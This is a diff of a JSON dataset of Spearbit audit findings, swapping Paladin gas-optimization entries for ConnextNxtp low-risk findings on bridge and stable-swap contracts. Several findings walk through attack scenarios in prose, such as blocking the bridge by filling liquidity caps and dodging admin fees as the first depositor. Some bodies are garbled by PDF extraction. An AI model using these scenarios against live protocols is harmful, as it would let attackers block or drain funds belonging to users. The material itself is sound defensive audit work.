"https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "When a call to the precompile contract at address(2) (or at address(3)) is made, the returned value is placed at the slot pointed by the free memory pointer and then placed on the stack. The free memory pointer is not incremented to account for this used memory position nor the code tries to clean this memory slot of 32 bytes. Therefore after a call to sha2, hash160 or hash256, we would end up with dirty bytes.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Optimize && operator usage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The check && consumes more gas than using multiple require statements. Example test can be seen below: //Gas Cost: 22515 function increaseQuestReward(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 feeAmount) ,! public { require(newRewardPerVote != 0 && addedRewardAmount != 0 && feeAmount != 0, \"QuestBoard: Null ,! amount\"); } //Gas Cost: 22477 function increaseQuestRewardTest(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 ,! feeAmount) public { require(newRewardPerVote != 0, \"QuestBoard: Null amount\"); require(addedRewardAmount != 0, \"QuestBoard: Null amount\"); require(feeAmount != 0, \"QuestBoard: Null amount\"); } Note : It costs more gas to deploy but it is worth it after X calls. Trade-offs should be considered.", + "title": "Fee on transfer token support", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "It seems that only the addLiquidity function is currently supporting the fee on transfer token. All operations like swapping are prohibiting the fee on transfer token. Note: The SwapUtilsExternal.sol contract allow fee on transfer token and as per product team, this is expected from this token", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Unnecesary value set to 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Since all default values in solidity are already 0 it riod.rewardAmountDistributed = 0; here as it should already be 0. is unnecessary to include _questPe-", + "title": "Fee on transfer tokens can stuck the transaction", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Consider the following scenario. 1. Assume User has made a xcall with amount A of token X with calldata C1. Since their was no fee while transferring funds, transfer was a success. 2. Now, before this amount can be transferred on the destination domain,token X introduced a fee on transfer. 3. Relayer now executes this transaction on destination domain via _handleExecuteTransaction function on BridgeFacet.sol#L756. 4. This transfers the amount A of token X to destination domain but since now the fee on this token has been introduced, destination domain receives amount A-delta. 5. This calldata is called on destination domain but the amount passed is A instead of A-delta so if the IXRe- ceiver has amount check then it will fail because it will now expect A amount when it really got A-delta amount.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Optimize unsigned integer comparison", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Check != 0 costs less gas compared to > 0 for unsigned integers in require statements with the optimizer enabled. While it may seem that > 0 is cheaper than !=0 this is only true without the optimizer being enabled and outside a require statement. If the optimizer is enabled at 10k and it is in a require statement, it would be more gas efficient.", + "title": "Initial Liquidity Provider can trick the system", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Since there is no cap on the amount which initial depositor can deposit, an attacker can trick the system in bypassing admin fees for other users by selling liquidity at half admin fees. Consider the following scenario. 1. User A provides the first liquidity of a huge amount. 2. Since there aren't any fees from initial liquidity, admin fees are not collected from User A. 3. Now User A can sell his liquidity to other users with half admin fees. 4. Other users can mint larger liquidity due to lesser fees and User A also get benefit of adminFees/2.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Use memory instead of storage in closeQuestPeriod() and closePartOfQuestPeriod()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "In functions closeQuestPeriod() and closePartOfQuestPeriod() a storage pointer _quest is set to quests[questsForPeriod[i]]. This is normally used when write access to the location is need. Nevertheless _quest is read only, to a copy of quests[questsForPeriod[i]] is also sufficient. This can save some gas. function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... Quest storage _quest = quests[questsForPeriod[i]]; ... gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest ... uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest ... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest ... ,! ,! } function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant { ... Quest storage _quest = quests[questIDs[i]]; ... gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest ... uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest ... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest ... ,! ,! ,! }", + "title": "Ensure non-zero local asset in _xcall()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Local asset fetched in _xcall() is not verified to be a non-zero address. In case, if token mappings are not updated correctly and to future-proof from later changes, it's better to revert if a zero address local asset is fetched. local = _getLocalAsset(key, canonical.id, canonical.domain);", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Revert string size optimization", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Shortening revert strings to fit in 32 bytes will decrease deploy time gas and will decrease runtime gas when the revert condition has been met. Revert strings using more than 32 bytes require at least one additional mstore, along with additional operations for computing memory offset.", + "title": "Use ExcessivelySafeCall to call xReceive()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "xReceive(). This is done to avoid copying large amount of return data in memory. This same attack vector exists for non-reconciled transfers, however in this case a usual function call is made for xReceive(). For However, in case non-reconciled calls fail due to this error, they can always be retried after reconciliation.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Optimize withdrawUnusedRewards() and emergencyWithdraw() with pointers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "ByQuest[questID][_questPeriods[i]] several times. pointer to read and update values. This will save gas and also make the code more readable. periods- It is possible to set a pointer to this record and use that withdrawUnusedRewards() emergencyWithdraw() Functions and use function withdrawUnusedRewards(uint256 questID, address recipient) external isAlive nonReentrant { ... if(periodsByQuest[questID][_questPeriods[i]].currentState == PeriodState.ACTIVE) { ... } ... uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount; ... if(withdrawableForPeriod > 0){ ... periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0; } ... } function emergencyWithdraw(uint256 questID, address recipient) external nonReentrant { ... if(periodsByQuest[questID][_questPeriods[i]].currentState != PeriodState.ACTIVE){ uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount; ... if(withdrawableForPeriod > 0){ ... periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0; } } else { .. totalWithdraw += periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod; periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod = 0; } ... }", + "title": "A router's liquidity might get trapped if the router is removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "If the owner or a user with Role.Router Role removes a router that does not implement calling re- moveRouterLiquidity or removeRouterLiquidityFor, then any liquidity remaining in the contract for the removed router cannot be transferred back to the router.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Needless to initialize variables with default values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "uint256 variables are initialized to a default value of 0 per Solidity docs. Setting a variable to the default value is unnecessary.", + "title": "In-flight transfers by the relayer can be reverted when setMaxRoutersPerTransfer is called before- hand by a lower number", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "For in-flight transfers where an approved sequencer has picked and signed an x number of routers for a transfer, from the time a relayer or another 3rd party grabs this ExecuteArgs _args to the time this party submits it to the destination domain by calling execute on a connext instance, the owner or an admin can call setMaxRoutersPerTransfer with a number lower than x on purpose or not. And this would cause the call to execute to revert with BridgeFacet__execute_maxRoutersExceeded.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Optimize the calculation of the currentPeriod", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The retrieval of currentPeriod is relatively gas expensive because it requires an SLOAD instruction (100 gas) every time. Calculating (block.timestamp / WEEK) * WEEK; is cheaper (TIMESTAMP: 2 gas, MUL: 5 gas, DIV: 5 gas). Refer to evm.codes for more information. Additionally, there is a risk that the call to updatePeriod() is forgotten although it does not happen in the current code. function updatePeriod() public { if (block.timestamp >= currentPeriod + WEEK) { currentPeriod = (block.timestamp / WEEK) * WEEK; } } Note: it is also possible to do all calculations with (block.timestamp / WEEK) instead of (block.timestamp / WEEK) * WEEK, but as the Paladin project has indicated:\"\" This currentPeriod is a timestamp, showing the start date of the current period, and based from the Curve system (because we want the same timestamp they have in the GaugeController).\"", + "title": "All the privileged users that can call withdrawSwapAdminFees would need to trust each other", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The owner needs to trust all the admins and also all admins need to trust each other. Since any admin can call withdrawSwapAdminFees endpoint to withdraw all the pool's admin fees into their account.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Change memory to calldata", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "For the function parameters, it is often more optimal to have the reference location to be calldata instead of memory. Changing bytes to calldata will decrease gas usage. OpenZeppelin Pull Request", + "title": "The supplied _a to initializeSwap cannot be directly updated but only ramped", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter) the supplied _a (the scaled amplification coefficient, Ann(cid:0)1 ) to initializeSwap cannot be directly updated but only ramped. The owner or the admin can still call rampA to update _a, but it will take some time for it to reach the desired value. This is mostly important if by mistake an incorrect value for _a is provided to initializeSwap.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Caching array length at the beginning of function can save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Caching array length at the beginning of the function can save gas in the several locations. function multiClaim(address account, ClaimParams[] calldata claims) external { require(claims.length != 0, \"MultiMerkle: empty parameters\"); uint256 length = claims.length; // if this is done before the require, the require can use \"length\" ... }", + "title": "Inconsistent behavior when xcall with a non-existent _params.to", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A xcall with a non-existent _params.to behaves differently depending on the path taken. 1. Fast Liquidity Path - Use IXReceiver(_params.to).xReceive. The _executeCalldata function will revert if _params.to is non-existent. Which technically means that the execution has failed. 2. Slow Path - Use ExcessivelySafeCall.excessivelySafeCall. This function uses the low-level call, which will not revert and will return true if the _params.to is non-existent. The _executeCalldata function will return with success set to True, which means the execution has succeeded.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Check amount is greater than 0 to avoid calling safeTransfer() unnecessarily", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "A check should be added to make sure amount is greater than 0 to avoid calling safeTransfer() unnecessarily.", + "title": "The lpToken cloned in initializeSwap cannot be updated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter) an LPToken lpToken is created by cloning the provided lpTokenTargetAddress to the initializeSwap endpoint. There is no restriction on lpTokenTargetAddress except that it would need to be of LPToken like, but it can be malicious under the hood or have some security vulnerabilities, so it can not be trusted.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Unchecked{++i} is more efficient than i++", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The function getAllQuestPeriodsForQuestId uses i++ which costs more gas than ++i, especially in a loop. Also, the createQuest function uses nextID += 1 which costs more gas than ++nextID. Finally the initialization of i = 0 can be skipped, as 0 is the default value.", + "title": "Lack of zero check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Consider the following scenarions. Instance 1 - BridgeFacet.addSequencer The addSequencer function of BridgeFacet.sol does not check that the sequencer address is not zero before adding them. function addSequencer(address _sequencer) external onlyOwnerOrAdmin { if (s.approvedSequencers[_sequencer]) revert BridgeFacet__addSequencer_alreadyApproved(); s.approvedSequencers[_sequencer] = true; emit SequencerAdded(_sequencer, msg.sender); } If there is a mistake during initialization or upgrade, and set s.approvedSequencers[0] = true, anyone might be able to craft a payload to execute on the bridge because the attacker can bypass the following validation within the execute function. if (!s.approvedSequencers[_args.sequencer]) { revert BridgeFacet__execute_notSupportedSequencer(); } Instance 2 - BridgeFacet.enrollRemoteRouter 43 The enrollRemoteRouter function of BridgeFacet.sol does not check that the domain or router address is not zero before adding them. function enrollRemoteRouter(uint32 _domain, bytes32 _router) external onlyOwnerOrAdmin { // Make sure we aren't setting the current domain as the connextion. if (_domain == s.domain) { revert BridgeFacet__addRemote_invalidDomain(); } s.remotes[_domain] = _router; emit RemoteAdded(_domain, TypeCasts.bytes32ToAddress(_router), msg.sender); } Instance 3 - TokenFacet._enrollAdoptedAndLocalAssets The _enrollAdoptedAndLocalAssets function of TokenFacet.sol does not check that the _canonical.domain and _canonical.id are not zero before adding them. function _enrollAdoptedAndLocalAssets( address _adopted, address _local, address _stableSwapPool, TokenId calldata _canonical ) internal returns (bytes32 _key) { // Get the key _key = AssetLogic.calculateCanonicalHash(_canonical.id, _canonical.domain); // Get true adopted address adopted = _adopted == address(0) ? _local : _adopted; // Sanity check: needs approval if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); // Update approved assets mapping s.approvedAssets[_key] = true; // Update the adopted mapping using convention of local == adopted iff (_adooted == address(0)) s.adoptedToCanonical[adopted].domain = _canonical.domain; s.adoptedToCanonical[adopted].id = _canonical.id; These two values are used for generating the key to determine if a particular asset has been approved. Additionally, zero value is treated as a null check within the AssetLogic.getCanonicalTokenId function: // Check to see if candidate is an adopted asset. _canonical = s.adoptedToCanonical[_candidate]; if (_canonical.domain != 0) { // Candidate is an adopted asset, return canonical info. return _canonical; }", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Could replace claims[i].questID with questID", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Could replace claims[i].questID with questID (as they are equal due to the check above)", + "title": "When initializing Connext bridge make sure _xAppConnectionManager domain matches the one pro- vided to the initialization function for the bridgee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The only contract that implements IConnectorManager fully is SpokeConnector (through inheriting ConnectorManager and overriding localDomain): 45 // File: SpokeConnector.sol function localDomain() external view override returns (uint32) { return DOMAIN; } So a SpokeConnector or a IConnectorManager has its own concept of the local domain (the domain that it lives / is deployed on). And this domain is used when we are hashing messages and inserting them into the SpokeCon- nector's merkle tree: // File: SpokeConnector.sol bytes memory _message = Message.formatMessage( DOMAIN, bytes32(uint256(uint160(msg.sender))), _nonce, _destinationDomain, _recipientAddress, _messageBody ); // Insert the hashed message into the Merkle tree. bytes32 _messageHash = keccak256(_message); // Returns the root calculated after insertion of message, needed for events for // watchers (bytes32 _root, uint256 _count) = MERKLE.insert(_messageHash); We need to make sure that this local domain matches the _domain provided to this init function. Otherwise, the message hashes that are inserted into SpokeConnector's merkle tree would have 2 different origin domains linked to them. One from SpokeConnector in this message hash and one from connext's s.domain = _domain which is used in calculating the transfer id hash. The same issue applies to setXAppConnectionManager.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Change function visibility from public to external", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The function updateRewardToken of the QuestBoard contract could be set external to save gas and improve code quality.", + "title": "The stable swap pools used in Connext are incompatible with tokens with varying decimals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The stable swap functionality used in Connext calculates and stores for each token in a pool, the token's precision relative to the pool's precision. The token precision calculation uses the token's decimals. And since this precision is only set once, for a token that can have its decimals changed at a later time in the future, the precision used might not be always accurate in the future. And so in the event of a token decimal change, the swap calculations involving this token would be inaccurate. For exmpale in _xp(...): function _xp(uint256[] memory balances, uint256[] memory precisionMultipliers) internal pure returns (uint256[] memory) uint256 numTokens = balances.length; require(numTokens == precisionMultipliers.length, \"mismatch multipliers\"); uint256[] memory xp = new uint256[]numTokens; for (uint256 i; i < numTokens; ) { xp[i] = balances[i] * precisionMultipliers[i]; unchecked { ++i; } } return xp; { } We are multiplying in xp[i] = balances[i] * precisionMultipliers[i]; and cannot use division for tokens that have higher precision than the pool's default precision.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Functions isClaimed() and _setClaimed() can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The functions isClaimed() and _setClaimed() of the contract MultiMerkleDistributor can be optimized to save gas. See OZ BitMaps for inspiration.", + "title": "When Connext reaches the cap allowed custodied, race conditions can be created", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "When IERC20(local).balanceOf(address(this)) is close to s.caps[key] (this can be relative/subjective) for a canonical token on its canonical domain, a race condition gets created where users might try to frontrun each others calls to xcall or xcallIntoLocal to be included in a cross chain transfer. This race condition is actually between all users and all liquidity routers. Since there is a same type of check when routers try to add liquidity. uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); }", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Missing events for owner only functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Several key actions are defined without event declarations. Owner only functions that change critical parameters can emit events to record these changes on-chain for off-chain monitors/tools/interfaces.", + "title": "Prevent sequencers from signing multiple routes for the same cross-chain transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Liquidity routers only sign the hash of (transferId, pathLength) combo. This means that each router does not have a say in: 1. The ordering of routers provided/signed by the sequencer. 2. What other routers are used in the sequence. If a sequencer signs 2 different routes (set of routers) for a cross-chain transfer, a relayer can decide which set of routers to use and provide to BridgeFacet.execute to make sure the liquidity from a specific set of routers' balances is used (also the same possibility if 2 different sequencers sign 2 different routes for a cross-chain transfer).", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Use nonReentrant modifier in a consistent way", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The functions claim(), claimQuest() and recoverERC20() of contract MultiMerkleDistributor send tokens but dont have a nonReentrant modifier. All other functions that send tokens do have this modifier. Note: as the checks & effects patterns is used this is not really necessary. function claim(...) public { ... IERC20(rewardToken).safeTransfer(account, amount); } function claimQuest(...) external { ... IERC20(rewardToken).safeTransfer(account, totalClaimAmount); } function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { IERC20(token).safeTransfer(owner(), amount); return true; }", + "title": "Well-funded malicious actors can DOS the bridge", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A malicious actor (e.g. a well-funded cross-chain messaging competitor) can DOS the bridge cheaply. Assume Ethereum <-> Polygon bridge and the liquidity cap is set to 1m for USDC. 1. Using a slow transfer to avoid router liquidity fees, Bob (attacker) transferred 1m USDC from Ethereum to Polygon. 1m USDC will be locked on Connext's Bridge. Since the liquidity cap for USDC is filled, no one will be able to transfer any USDC from Ethereum to Polygon unless someone transfers POS-USDC from Polygon to Ethereum to reduce the amount of USDC held by the bridge. 2. On the destination chain, nextUSDC (local bridge asset) will be swapped to POS-USDC (adopted asset). The swap will incur low slippage because it is a stablewap. Assume that Bob will receive 999,900 POS-USDC back on Polygon. A few hundred or thousand loss is probably nothing for a determined competitor that wants to harm the reputation of Connext. 3. Bob bridged back the 999,900 POS-USDC using Polygon's Native POS bridge. Bob will receive 999,900 USDC in his wallet in Ethereum after 30 minutes. It is a 1-1 exchange using a native bridge, so no loss is incurred here. 4. Whenever the liquidity cap for USDC gets reduced on Connext's Bridge, Bob will repeat the same trick to keep the bridge in an locked state. 5. If Bob is well-funded enough, he could perform this against all Connext's bridges linked to other chains for popular assets (e.g. USDC), and normal users will have issues transferring popular assets when using xcall.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Place struct definition at the beginning of the contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Regarding Solidity Style Guide, the struct definition can move to the beginning of the contract.", + "title": "calculateTokenAmount is not checking whether amounts provided has the same length as balances", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "There is no check to make sure amounts.length == balances.length in calculateTokenAmount: function calculateTokenAmount( Swap storage self, uint256[] calldata amounts, bool deposit ) internal view returns (uint256) { uint256 a = _getAPrecise(self); uint256[] memory balances = self.balances; ... There are 2 bad cases: 49 1. amounts.length > balances.length, in this case, we have provided extra data which will be ignored silently and might cause miscalculation on or off chain. 2. amounts.length < balances.length, the loop in calculateTokenAmount would/should revert becasue of an index-out-of-bound error. In this case, we might spend more gas than necessary compared to if we had performed the check and reverted early.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Improve checks for past quests in increaseQuestReward() and increaseQuestObjective()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The functions increaseQuestReward() and increaseQuestObjective() check: newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote. This is true when the quest is in the past (e.g. currentPeriod is outside of the quest range), because all the values will be 0. Luckily execution is stopped at _getRemainingDuration(questID), however it would be more logical to put this check near the start of the function. function increaseQuestReward(...) ... { updatePeriod(); ... require(newRewardPerVote > periodsByQuest[questID][currentPeriod].rewardPerVote, \"QuestBoard: New reward must be higher\"); ... uint256 remainingDuration = _getRemainingDuration(questID); require(remainingDuration > 0, \"QuestBoard: no more incoming QuestPeriods\"); ... ,! } The function _getRemainingDuration() reverts when the quest is in the past, as currentPeriod will be larger than lastPeriod. The is not what you would expect from this function. function _getRemainingDuration(uint256 questID) internal view returns(uint256) { uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; return (lastPeriod - currentPeriod) / WEEK; // can revert }", + "title": "Rearrange an expression in _calculateSwapInv to avoid underflows", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In the following expression used in SwapUtils_calculateSwapInv, if xp[tokenIndexFrom] = x + 1 the expression would underflow and revert. We can arrange the expression to avoid reverting in this edge case. dx = x - xp[tokenIndexFrom] + 1;", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Should make use of token.balanceOf(address(this)); to recover tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Currently when calling the recoverERC20() function there is no way to calculate what the proper amount should be without having to check the contracts balance of token before hand. This will require an extra step and can be easily done inside the function itself.", + "title": "The pre-image of DIAMOND_STORAGE_POSITION's storage slot is known", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The preimage of the hashed storage slot DIAMOND_STORAGE_POSITION is known.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Floating pragma is set", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The current pragma Solidity directive is ^0.8.10. It is recommended to specify a specific compiler version to ensure that the byte code produced does not vary between builds. Contracts should be deployed using the same compiler version/flags with which they have been tested. Locking the pragma (for e.g. by not using ^ in pragma solidity 0.8.10) ensures that contracts do not accidentally get deployed using an older compiler version with known compiler bugs.", + "title": "The @param NatSpec comment for _key in AssetLogic._swapAsset is incorrect", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The @param NatSpec for _key indicates that this parameter is a canonical token id where instead it should mention that it is a hash of a canonical id and its corresponding domain. We need to make sure the correct value has been passed down to _swapAsset.", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Deflationary reward tokens are not handled uniformly across the protocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The code base does not support rebasing/deflationary/inflationary reward tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest.", + "title": "Malicious routers can temporarily DOS the bridge by depositing a large amount of liquidity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Both router and bridge share the same liquidity cap on the Connext bridge. Assume that the liquidity cap for USDC is 1 million on Ethereum. Shortly after the Connext Amarok launch, a router adds 1 million USDC liquidity. No one would be able to perform a xcall transfer with USDC from Ethereum to other chains as it will always revert because the liquidity cap has exceeded. The DOS is temporary because the router's liquidity on Ethereum will be reduced if there is USDC liquidity flowing in the opposite direction (e.g., From Polygon to Ethereum)", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Typo on comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Across the codebase, there is a typo on the comment. The comment can be seen from the below. * @dev Returns the number of periods to come for a give nQuest", + "title": "Prevent deploying a representation token twice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function setupAsset() is protected by _enrollAdoptedAndLocalAssets() which checks s.approvedAssets[_key] to prevent accidentally setting up an asset twice. However the function _removeAssetId() is rather thorough and removes the s.approvedAssets[_key] flag. After a call to _removeAssetId(), an asset can be recreated via setupAsset(). This will deploy a second representation token which will be confusing to users of Connext. Note: The function setupAssetWithDeployedRepresentation() could be used to connect a previous presentation token again to the canonical token. Note: All these functions are authorized so it would only be a problem if mistakes are made. 51 function setupAsset(...) ... onlyOwnerOrAdmin ... { if (_canonical.domain != s.domain) { _local = _deployRepresentation(...); // deploys a new token } else { ... } bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _local, _stableSwapPool, _canonical); ... } function _enrollAdoptedAndLocalAssets(...) ... { ... if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); s.approvedAssets[_key] = true; ... } function _removeAssetId(...) ... { ... delete s.approvedAssets[_key]; ... }", "labels": [ "Spearbit", - "Paladin", - "Severity: Informational" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Require statement with gauge_types function call is redundant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The gauge_types function of the Curve reverts when an invalid gauge is given as a parameter, the QuestBoard: Invalid Gauge error message will not be seen in the QuestBoard contract. The documentation can be seen from the Querying Gauge and Type Weights. function createQuest(...) ... { ... 